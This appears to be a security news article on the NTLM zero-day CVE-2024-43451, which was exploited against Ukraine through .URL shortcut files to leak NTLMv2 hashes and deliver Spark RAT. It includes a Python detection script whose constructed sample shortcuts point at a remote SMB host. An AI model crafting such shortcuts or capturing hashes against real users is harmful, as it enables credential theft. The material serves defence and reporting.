A newly discovered security vulnerability in Windows NT LAN Manager (NTLM) has been exploited in a zero-day attack, with suspected ties to Russian threat actors targeting Ukraine. The vulnerability, tracked as CVE-2024-43451 and rated with a CVSS score of 6.5, could allow an attacker to disclose a user's NTLMv2 hash. Microsoft addressed the flaw with a patch earlier this week.

Microsoft's advisory notes that the vulnerability can be triggered with minimal user interaction, such as merely selecting or inspecting a malicious file. This low bar for exploitation underscores how important user awareness remains in cybersecurity defenses.

ClearSky, an Israeli cybersecurity firm, identified exploitation of this zero-day vulnerability as early as June 2024. They noted that it has been leveraged as part of a broader attack chain deploying the open-source Spark RAT malware. ClearSky detailed that the flaw facilitates malicious actions through URL files hosted on an official Ukrainian government website, where users are misled into downloading academic certificates.

Phishing emails from a compromised Ukrainian government server prompt recipients to follow a malicious URL to renew their academic credentials. This results in the download of a ZIP file containing an internet shortcut file (.URL). The exploitation occurs when a user interacts with this URL file in specific ways, such as right-clicking or moving it between folders.

The malicious URL file establishes connections with external servers to retrieve additional payloads, including the Spark RAT. ClearSky also reported alerts indicating attempts to capture NTLM hashes over the SMB protocol. A captured hash would allow an adversary to conduct a Pass-the-Hash attack, authenticating as the user linked to that hash without ever knowing the password.
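A defender-side check for the .URL shortcut files this campaign relies on, added here as an illustration rather than anything from ClearSky's or CERT-UA's reporting: it parses a shortcut's INI fields and flags any that would make Windows open an outbound SMB or WebDAV connection (and so present NTLM credentials) to a remote host. The sample files and the 203.0.113.10 address are constructed; the page does not state which field triggers the leak, so the assumption that a UNC or file:// reference in the shortcut is the trigger is this example's, not the article's.

```python
import configparser
import re
from urllib.parse import urlparse

# Constructed sample .URL files (not the campaign's real artifacts).
SAMPLES = {
    "benign.url": "[InternetShortcut]\nURL=https://example.org/docs\nIconIndex=0\n",
    "leaky_iconfile.url": (
        "[InternetShortcut]\nURL=https://example.org/cert\n"
        "IconFile=\\\\203.0.113.10\\share\\icon.ico\nIconIndex=1\n"
    ),
    "leaky_fileurl.url": "[InternetShortcut]\nURL=file://203.0.113.10/share/cert.pdf\n",
}

# \\host\share\... : a UNC path resolved over SMB (or WebDAV fallback).
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
# Fields Explorer resolves when it renders or handles the shortcut (assumed set).
REMOTE_FIELDS = ("url", "iconfile", "workingdirectory")


def remote_host(value):
    """Return the host a field value would make Windows contact, or None."""
    value = value.strip()
    m = UNC_RE.match(value)
    if m:
        return m.group(1)
    p = urlparse(value)
    if p.scheme == "file" and p.netloc:
        return p.netloc
    return None


def scan_url_file(text):
    """Return (field, host) pairs that would cause an outbound authentication attempt."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):  # configparser lower-cases keys
            if key in REMOTE_FIELDS:
                host = remote_host(value)
                if host:
                    findings.append((key, host))
    return findings


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_url_file(body) or "clean")
```

Run this over files extracted from inbound ZIP attachments before they reach a user; as a compensating control, blocking outbound TCP/445 at the perimeter stops the hash from leaving the network even when a shortcut is opened.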

Ukraine's Computer Emergency Response Team (CERT-UA) has attributed these incidents to a likely Russian actor tracked as UAC-0194. CERT-UA has also recently warned about phishing campaigns that use tax-related lures to distribute LiteManager, a legitimate remote desktop tool, pointing to a financially motivated threat landscape.

CERT-UA has warned that businesses with employees managing remote banking systems are particularly vulnerable, citing investigations that show rapid progression from initial compromise to significant financial theft. The swift nature of these attacks emphasizes the ongoing need for robust cybersecurity measures, especially in a high-stakes environment shaped by geopolitical tensions.
